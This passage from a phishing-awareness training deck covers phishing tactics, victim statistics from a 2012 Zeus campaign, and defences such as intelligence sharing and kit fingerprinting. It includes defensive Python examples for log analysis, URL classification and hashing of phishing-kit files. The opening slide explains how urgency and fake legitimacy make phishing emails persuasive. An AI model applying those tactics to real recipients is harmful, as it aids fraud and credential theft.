    Here’s the email that we’ll use. We include a date so that it seems relevant. We design in a sense of urgency by indicating that there are only 15 days to respond, and we add other details such as a label number to make it appear legitimate. There are actually a lot of psychological elements that go into the design of a good phishing email. By appealing to basic human instincts, creating a sense of urgency, appearing to give people something they want, and making them believe the legitimacy of something they want to believe, the success rate of phishing attempts increases.
  • 41. Section 5: Performing Phishing Attacks. Tossing Bait Results. Of the 9,116 visitors who actually downloaded malware from the malicious URL, those who were using webmail clients left “referrer” tags:
    • 764 Yahoo webmail users
    • 275 Live.com (Microsoft) webmail users
    • 174 AOL webmail users
    • 36 Comcast, 19 Verizon, 14 Earthlink, 12 Roadrunner, 6 Charter, 4 Juno
    Who was infected with the malware?
    • 10 U.S. Federal and many State government agencies
    • 231 Canadian IP addresses (though 132 were RIM/BlackBerry)
    • 59 different universities and colleges
    • 9 banks (up to 19 IPs!), 3 brokerages (one had 10 IPs!)
    • Energy companies (one had 17 downloads!)
    • Airlines, beverage companies, chemical companies, cruise lines, defense contractors, hospitals, newspapers, professional sports teams, publishers, retail department stores, Silicon Valley companies, theme parks
    • 7,000+ users from 59 major ISPs; 14 of those ISPs had between 100 and 973 users infected
    For this particular attack, we can get a pretty good idea of what the results will be. Why? Because this was an actual attack performed in 2012, impersonating the United States Postal Service. A thorough analysis of the web server used to host it turned up the server’s access logs, and the data on this slide was derived from them. This data is very telling. Many of the systems that downloaded the malware were not able to detect it, even though it was Zeus, a commonly used malware kit. Many of these organizations also have URL filters meant to help prevent phishing, but this URL was not blocked. The email providers didn’t help either: they did not flag the message as spam. Overall, a very effective campaign.
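The breakdown on this slide came out of the lure host's access logs: the Referer header on each download records which webmail client the victim read the message in, and the User-Agent shows the BlackBerry clients. The script below reproduces that kind of analysis on a constructed Apache combined-format log. It is an added example, not Malcovery's tooling or the real logs; the referer-to-provider mapping is an assumption, and the lure path is taken from the email on slide 40.

```python
"""Rebuild the 'who clicked, from which webmail' picture from the lure host's
access log. Added example; the log lines are constructed, not the real logs."""
import re
from collections import defaultdict
from typing import Dict, Optional
from urllib.parse import urlsplit

# Apache/nginx "combined" log format.
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Referer host suffix -> webmail provider. Assumed mapping for the demo.
WEBMAIL = {
    "mail.yahoo.com": "Yahoo",
    "mail.live.com": "Live.com",
    "mail.aol.com": "AOL",
    "comcast.net": "Comcast",
}

# Path of the lure from the slide's email.
PAYLOAD_PATH = "/shipping/trackandconfirm.php"

# Constructed log: five distinct clients fetch the payload (one of them twice),
# one asks for robots.txt, and one line is garbage the parser must survive.
SAMPLE_LOG = """\
203.0.113.10 - - [24/Oct/2012:14:03:11 -0400] "GET /shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 HTTP/1.1" 200 51200 "http://us-mg5.mail.yahoo.com/neo/launch" "Mozilla/5.0 (Windows NT 6.1)"
203.0.113.10 - - [24/Oct/2012:14:03:40 -0400] "GET /shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 HTTP/1.1" 200 51200 "http://us-mg5.mail.yahoo.com/neo/launch" "Mozilla/5.0 (Windows NT 6.1)"
198.51.100.7 - - [24/Oct/2012:14:05:02 -0400] "GET /shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 HTTP/1.1" 200 51200 "https://bay179.mail.live.com/mail/InboxLight.aspx" "Mozilla/5.0 (Windows NT 5.1)"
198.51.100.8 - - [24/Oct/2012:14:06:19 -0400] "GET /shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 HTTP/1.1" 200 51200 "http://mail.aol.com/37085-111/aol-6/en-us/Suite.aspx" "Mozilla/5.0 (Macintosh)"
192.0.2.44 - - [24/Oct/2012:14:08:55 -0400] "GET /shipping/trackandconfirm.php?navigation=1&respLang=Eng&resp=10242012 HTTP/1.1" 200 51200 "-" "BlackBerry9700/5.0.0.862 Profile/MIDP-2.1"
192.0.2.45 - - [24/Oct/2012:14:09:01 -0400] "GET /robots.txt HTTP/1.1" 404 0 "-" "Mozilla/5.0 (compatible; crawler)"
192.0.2.46 - - [24/Oct/2012:14:11:30 -0400] "GET /shipping/trackandconfirm.php HTTP/1.1" 200 51200 "http://web.mail.comcast.net/zimbra/mail" "Mozilla/5.0 (Windows NT 6.1)"
this line is not a log entry
"""


def webmail_provider(referer: str) -> Optional[str]:
    """Map a Referer URL to a webmail provider, or None for '-' / unknown hosts."""
    host = urlsplit(referer).hostname or ""
    for suffix, label in WEBMAIL.items():
        if host == suffix or host.endswith("." + suffix):
            return label
    return None


def summarize(log_text: str, payload_path: str = PAYLOAD_PATH) -> Dict[str, object]:
    """Distinct client IPs that were served the lure, split by the webmail
    client the Referer reveals, plus the BlackBerry share the slide mentions."""
    victims = set()
    by_provider = defaultdict(set)
    blackberry = set()
    unparsed = 0
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if m is None:
            unparsed += 1
            continue
        if m["status"] != "200" or not m["path"].startswith(payload_path):
            continue  # probes, scanners and 404s are not victims
        victims.add(m["ip"])
        provider = webmail_provider(m["referer"])
        if provider:
            by_provider[provider].add(m["ip"])
        if "blackberry" in m["ua"].lower():
            blackberry.add(m["ip"])
    return {
        "victims": len(victims),
        "by_provider": {p: len(ips) for p, ips in sorted(by_provider.items())},
        "blackberry": len(blackberry),
        "unparsed": unparsed,
    }


if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```

Counting distinct client IPs rather than requests is deliberate: a victim who clicks twice, or whose browser retries, would otherwise be counted twice, and a 404 from a scanner is not a victim. Desktop mail clients send no Referer, so the provider split is always a lower bound on the webmail population, as it is on the slide.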
  • 42. Section 5: Performing Phishing Attacks. There are Plenty of Phish in the Sea! We have already seen these statistics, but as a reminder:
    • The average uptime of a phishing site: 44 hours 39 minutes (APWG Global Phishing Survey 1H2013)
    • The number of targeted brands: 720 (APWG Global Phishing Survey 1H2013)
    • 37.3 million users experienced phishing attacks last year, “an increase of 87%” (Kaspersky Lab, June 2013)
    • In the second half of 2012, 6.8% of sent email was malware distribution and 4.9% of sent email was phishing distribution (Microsoft Security Intelligence Report v.14)
    Looking at the research from APWG, Kaspersky Lab and Microsoft, phishing is prolific, increasing in frequency, and obviously still very effective. Current defenses aren’t working well enough, and this problem is not going away. When a phishing site is up for less than two days, how do you react fast enough to block the URL? With that many brands targeted, how do you protect yours? With the number of users attacked increasing and the sheer volume of phishing and malware emails being sent, how do you keep users safe?
  • 43. How To Catch a Phish: User Awareness and Training Slide: 1 Section 6: Preventions + Solutions Section 6 Preventions + Solutions
  • 44. How To Catch a Phish: User Awareness and Training Slide: 2 Section 6: Preventions + Solutions Simple things... Lets just start by the real simple stuff to tell our staff members and colleagues – i.e. the simple DIY stuff. Ways to avoid phishing scams include, for example: 1. Guarding against email spam 2. If in doubt communicate personal information only via phone or secure web sites - i.e. look for HTTPS - as a minimum 3. Do not click on links, download files or open attachments in emails from unknown senders 4. It is best to open attachments only when you are expecting them and know what they contain, even if you know the sender. 5. Protect your computer with a firewall, spam filters, anti-virus and anti-spyware software. Do some research to ensure you are get- ting the most up-to-date software, and update them all regularly to ensure that you are blocking from new viruses and spyware. Client-based anti-phishing programs are another ‘norm’ when it comes to phishing defense. Email clients are many and include for example avast!, Avita, ESET Smart security, McAfee etc.
  • 45. How To Catch a Phish: User Awareness and Training Slide: 3 Section 6: Preventions + Solutions What Doesn’t Work? Phishing prevention using traditional techniques does not work • Manual Blacklisting • DNS Blocking • Phisher Identification We already know things that don’t work. Manual blacklisting of URLs is too slow to be effective. DNS blocking has the same problem. Traditional techniques like this simply don’t move fast enough to handle the volume and rapid pace of phishing attempts today. As we’ve already discussed, emailing the owner of a domain can be not only ineffective, but serve as a warning to the phisher that it’s time to move to a new domain name. And manually digging through data to try to identify a phisher is slow, arduous, and rarely effective because you only have the information that you’ve been able to gather. That typically doesn’t give you enough information to identify attacks that might be able to be identified by aggregating informa- tion from other companies being phished.
  • 46. How To Catch a Phish: User Awareness and Training Slide: 4 Section 6: Preventions + Solutions What Does Work? Valid Countermeasures • Using Intelligence • Shared Knowledge • Automatic Responses • Malware Analysis Results • Internal Scanning The best defense against phishing is to use the same valuable item that phishing at- tempts to gather, i.e. information. By gathering intelligence on phishing attempts and taking appropriate actions, you can save the phish as much as possible. But it requires different intelligence gathering than has been commonly used in the past. You need aggregated information from phishing attempts associated with your company as well as others. You need to be able to be able to automatically respond to trends found in that aggregated data. You need to have data available that identify email subjects, hostile URLs, hostile attachments, analysis of the actions performed by the malware used directly and any additional malware dropped or used by the attack, and to be able to combine all of this intel- ligence with your own internal scanning results.
  • 47. How To Catch a Phish: User Awareness and Training Slide: 5 Section 6: Preventions + Solutions What Does Work? Educate, educate, educate! • Teach your employees • Teach your customers Finally, one of the best non-technical defenses is education. You need to teach others in your organization about phishing and about its impact. This education needs to be given to every employee so that they know what phishing is and how dangerous it can be. In addition, teach your customers about phishing! When phishing emails are circulating about your brand, make sure that your customers are aware of them and that phishing targets everyone, not just your company. Your customer’s perception of your company is a major factor of your reputation and by educating your customer, you can help main- tain a positive reputation. Using this, the next time your customer gets attacked with a phishing attempt targeting your brand, they can correctly blame the phisher, not you.
Slide: 6
Section 6: Preventions + Solutions

What Does Work? Preventing Vulnerabilities Being Exploited (of course!)
Firm up defences against:
• Password brute-forcing
• Vulnerable applications
• Failure to patch websites

Web application vulnerability scanning tools like Acunetix, OpenVAS, Nikto, Nessus or Qualys will help with understanding possible vulnerabilities but won’t do very much to flag possible phishing attacks. Web scanning tools will help prevent a web server becoming a phishing springboard, but they won’t fix or ease phishing attacks.
Slide: 7
Section 6: Preventions + Solutions

Malcovery: Cyber Intelligence & Forensics System Architecture

The Malcovery Cyber Intelligence & Forensics System Architecture is a cloud-based software and services technology which works off the Malcovery Threat Database. This database receives feeds from various proprietary and public sources; these provide the data on which the intelligence and forensic activities are based. One part of the process, the Malcovery Spam Data Mine, has the technology to analyze approximately one million emails per day and to extract, count, and de-duplicate any new URLs, which are then scanned and indexed. The current collection holds over 500 million spam emails and grows by more than one million emails per day, allowing the platform to respond to queries about a wide range of email-based crimes and to build unique intelligence reports and data. Because phishing emails are generated programmatically, the emails can be processed with tools. The Malcovery platform auto-classifies about 65% of the scanned phishing URLs, which means that within seconds of seeing the URL for the first time, the system has fetched, confirmed, and assigned a brand to the URL. URLs which cannot be automatically classified are presented to the Operations Team for human classification. When a phish attack is classified, the pattern is learned by the system automatically, and can be matched upon in the future. When the Operations Team confirms a phish and labels it with a brand, that pattern becomes part of a collection of “known phishing patterns” stored in the MCIF database.
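The extract / count / de-duplicate / auto-classify loop described on this slide, written out as an added Python example. This is not Malcovery's code: the sample emails, the `.invalid` domains, the regex patterns, the `learn_pattern` helper and the brand labels are all constructed for the example; only the two CIBC-style kit paths come from the slides.

```python
"""Added example (not Malcovery's code): a miniature "spam data mine".

Raw emails go in; every URL is extracted, counted and de-duplicated; each
unique URL is then auto-classified against known phishing patterns and
labelled with a brand, or sent to a human-review queue when no pattern
matches.  A confirmed review result is turned into a new pattern so the
same kit directory is recognised automatically next time.  All messages,
domains, patterns and brand labels below are constructed for the example.
"""
import re
from collections import Counter
from email import message_from_string
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)

# Known phishing patterns: a regex over the URL path plus the brand it imitates.
# The two CIBC-style paths come from the slides; the regexes are constructed.
KNOWN_PATTERNS = [
    (re.compile(r"^/cibadministrator/", re.IGNORECASE), "CIBC"),
    (re.compile(r"^/cibc/.*PreSignOn", re.IGNORECASE), "CIBC"),
]

# Constructed spam sample: two copies of one lure plus an unrelated message.
SAMPLE_EMAILS = [
    "From: alerts@example.invalid\nSubject: Your account\n\n"
    "Verify at http://login-bank-example.invalid/cibc/PreSignOn.cibc.htm now\n",
    "From: alerts@example.invalid\nSubject: Your account\n\n"
    "Verify at http://login-bank-example.invalid/cibc/PreSignOn.cibc.htm now\n",
    "From: billing@example.invalid\nSubject: Invoice\n\n"
    "See http://shop.example.invalid/wp-admin/inv.php and https://www.example.com/\n",
]


def extract_urls(raw_email: str) -> list:
    """Return every http(s) URL in the message body (all parts if multipart)."""
    msg = message_from_string(raw_email)
    parts = msg.walk() if msg.is_multipart() else [msg]
    urls = []
    for part in parts:
        payload = part.get_payload(decode=True)  # None for multipart containers
        if payload:
            urls.extend(URL_RE.findall(payload.decode("utf-8", "replace")))
    return urls


def count_urls(emails) -> Counter:
    """De-duplicate URLs across the corpus and count how often each was seen."""
    counts = Counter()
    for raw in emails:
        counts.update(extract_urls(raw))
    return counts


def classify(url: str, patterns=None):
    """Brand label for a URL whose path matches a known pattern, else None."""
    path = urlparse(url).path
    for pattern, brand in (KNOWN_PATTERNS if patterns is None else patterns):
        if pattern.search(path):
            return brand
    return None


def process(emails, patterns=None):
    """Run the pipeline: returns (counts, auto-classified, human-review queue)."""
    counts = count_urls(emails)
    classified, review_queue = {}, []
    for url in counts:  # Counter keeps first-seen order
        brand = classify(url, patterns)
        if brand:
            classified[url] = brand
        else:
            review_queue.append(url)
    return counts, classified, review_queue


def learn_pattern(patterns, url: str, brand: str):
    """After a human confirms a phish, learn its directory as a new pattern so
    later URLs in the same kit directory are classified automatically."""
    directory = urlparse(url).path.rsplit("/", 1)[0] + "/"
    return patterns + [(re.compile("^" + re.escape(directory), re.IGNORECASE), brand)]


if __name__ == "__main__":
    counts, classified, queue = process(SAMPLE_EMAILS)
    for url, n in counts.most_common():
        print(n, url, "->", classified.get(url, "NEEDS REVIEW"))
    learned = learn_pattern(KNOWN_PATTERNS, queue[0], "ExampleShop")
    print(classify(queue[0], learned))
```

The review queue is where the slide's "remaining 35%" lands; `learn_pattern` returns a new pattern list rather than mutating the shared one, so a human decision is only promoted to an automatic rule when the caller chooses to install it.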
Slide: 8
Section 6: Preventions + Solutions

“Phishing kit” duplication prevention

As we discovered, most phishing sites are created by uploading, and then unpacking, a “phishing kit”, which is typically a zipped folder containing the contents of the website. The Malcovery solution “hashes” each HTML, JPG, CSS, GIF, JS, etc. file that constitutes the fake website. Their Phishing Intelligence system can very quickly and reliably determine if a NEW site matches a previously learned pattern and therefore find identical scams in the wild. This helps, of course, to protect your brand or your clients’ brand.
Slide: 9
Section 6: Preventions + Solutions

One of these things is not like the others...

Through analysis of more than 550,000 confirmed phishing sites, the Malcovery PhishIQ System has become very good at determining which things belong together. Detecting phishing activity and presence can be tedious at best and difficult at all times. Malcovery offers a solution through their PhishIQ technology, which analyses more than 550,000 confirmed phishing sites and has identified hundreds of thousands of patterns that alert clients to phishing risks.
Slide: 10
Section 6: Preventions + Solutions

Kits have predictable paths

Phishing kits have predictable paths. For example, when we unzip a file, it places its contents based on the directory structure in the ZIP file. So “/cibadministrator/index.htm” is likely from one kit, while “/cibc/cibc/PreSignOn.cibc.htm” is from another, and “/cibonline/” and “/cibc.com/” are likely from other phishing kits. Since phishing kits are very common, pattern-detection software is the most robust methodology to protect clients from phishing attacks. The Malcovery PhishIQ receives tens of thousands of potentially harmful phishing sites per day. Each of these is retrieved, evaluated, “branded,” and clustered in real time.
Slide: 11
Section 6: Preventions + Solutions

“wp-admin”

A number of vulnerabilities, configuration errors, and poor password choices make WordPress sites very easy to compromise. In fact, one of the most common paths seen in both phishing and malware sites is “wp-admin” – something which the Malcovery Intelligence & Forensics (MCIF) System Architecture is very good at detecting.
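The three preceding slides describe one detection idea from three angles: hash every file of a kit so a re-upload is recognised (slide 8), treat the kit's directory layout as a signature (slide 10), and flag the "wp-admin" path as the mark of a compromised WordPress host (slide 11). The added Python example below implements all three on one constructed crawl. It is not Malcovery's or PhishIQ's code; the kit names, file bodies, the 0.6 similarity threshold and the Jaccard comparison are assumptions made for the example, and only the "cibadministrator", "cibc/cibc/PreSignOn" and "wp-admin" path fragments come from the slides.

```python
"""Added example (not Malcovery's code): fingerprinting a phishing kit.

Two fingerprints are derived from a crawled site (a dict of URL path -> file
bytes): the set of SHA-256 hashes of its files, compared by Jaccard
similarity with kits seen before (the "hash every HTML/JPG/CSS/GIF/JS file"
idea), and the set of directory names in its paths, compared with known kit
layouts and with the "wp-admin" marker of a compromised WordPress host.
Every kit name, path and file body below is constructed for the example.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class KitFingerprint:
    name: str
    file_hashes: frozenset   # SHA-256 of every file in the kit
    path_markers: frozenset  # directory names that appear in the kit's paths


def fingerprint(name: str, site: dict) -> KitFingerprint:
    """Build both fingerprints from a site crawl (path -> file contents)."""
    hashes = frozenset(hashlib.sha256(body).hexdigest() for body in site.values())
    markers = frozenset(
        segment
        for path in site
        for segment in path.strip("/").split("/")[:-1]  # directories only, not the file name
    )
    return KitFingerprint(name, hashes, markers)


def jaccard(a: frozenset, b: frozenset) -> float:
    """Set similarity |a & b| / |a | b|; two empty sets count as identical."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


# Constructed "previously learned" kits. File bodies are deliberately inert text.
KNOWN_KITS = [
    fingerprint("cibadministrator-kit", {
        "/cibadministrator/index.htm": b"<html>fake CIB sign-in page</html>",
        "/cibadministrator/login.php": b"<?php /* kit form handler */ ?>",
        "/cibadministrator/style.css": b"body{margin:0}",
        "/cibadministrator/logo.gif": b"GIF89a-placeholder",
    }),
    fingerprint("cibc-presignon-kit", {
        "/cibc/cibc/PreSignOn.cibc.htm": b"<html>fake CIBC PreSignOn</html>",
        "/cibc/cibc/style.css": b"body{margin:0}",
    }),
]

WORDPRESS_MARKERS = frozenset({"wp-admin"})  # the common path named on the slide


def match_kit(site: dict, known=KNOWN_KITS, threshold: float = 0.6):
    """Return (kit name, similarity) for the closest known kit, or (None, best)
    when even the best similarity falls below the threshold (an assumed value)."""
    candidate = fingerprint("candidate", site)
    best_name, best_score = None, 0.0
    for kit in known:
        score = jaccard(candidate.file_hashes, kit.file_hashes)
        if score > best_score:
            best_name, best_score = kit.name, score
    return (best_name if best_score >= threshold else None), best_score


def path_findings(site: dict, known=KNOWN_KITS) -> list:
    """Explain which directory names tie the site to a known kit layout or to
    a likely compromised WordPress host."""
    candidate = fingerprint("candidate", site)
    findings = []
    for kit in known:
        shared = candidate.path_markers & kit.path_markers
        if shared:
            findings.append(f"shares directories {sorted(shared)} with {kit.name}")
    wp = candidate.path_markers & WORDPRESS_MARKERS
    if wp:
        findings.append(f"lives under {sorted(wp)}: probably a compromised WordPress host")
    return findings


# Constructed new sighting: the first kit re-uploaded into a WordPress admin
# directory with only index.htm edited, so 3 of 4 files hash identically.
NEW_SITE = {
    "/wp-admin/cibadministrator/index.htm": b"<html>fake CIB sign-in page, retitled</html>",
    "/wp-admin/cibadministrator/login.php": b"<?php /* kit form handler */ ?>",
    "/wp-admin/cibadministrator/style.css": b"body{margin:0}",
    "/wp-admin/cibadministrator/logo.gif": b"GIF89a-placeholder",
}

if __name__ == "__main__":
    print(match_kit(NEW_SITE))
    for line in path_findings(NEW_SITE):
        print(line)
```

Hashing whole files means a kit author only has to retouch one file to lower the score, which is why the content similarity is a ratio rather than an exact match and why the directory layout is kept as an independent signal: the edited `index.htm` above drops the similarity to 0.6, but the `cibadministrator` directory still ties the site to the known kit, and `wp-admin` separately marks the host as probably compromised rather than attacker-owned.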
Slide: 1
Section 7: Summary

Section 7
Summary
Slide: 2
Section 7: Summary

In Summary
• Traditional protection techniques are ineffective
• Phishing is easy and effective
• Phishing gathers information that can be used for a variety of purposes
• A variety of techniques are used to phish and camouflage the phisher
• Intelligence gathering, automated response, and education are the best defenses against phishing

The last three ‘take away’ points are these:

While phishing is an “old-fashioned” cyber security threat, attacks continue to increase. Corporations and their customers are continuing to experience phishing and malicious spam attacks. In fact, it’s happening more than ever before. 37.3 million users experienced phishing attacks in 2013, an increase of over 87% in one year.

The stakes are high for cybercrime victims. Banking/financial institutions, commerce companies, universities, etc. are frequent victims of cyber attacks, which are a form of cybercrime. Remediation costs and long-term loss of brand loyalty hurt the company’s bottom line. It is estimated that one of every 200 phishing attacks is successful. The average cost of a phishing attack is upwards of $150,000 to the organization. Those are significant costs.

Traditional methods simply aren’t working. Despite multiple layers of cybercrime defense and prevention, technologies and services such as end user education and training about phishing and spam, web filters, web gateway blacklists, and take down vendors aren’t working. Corporations and organizations continue to experience significant losses to malware, phishing, and other forms of cybercrime. The reason? Victims of phishing and malware have not been able to identify who the criminals are or the scope of the damages they cause.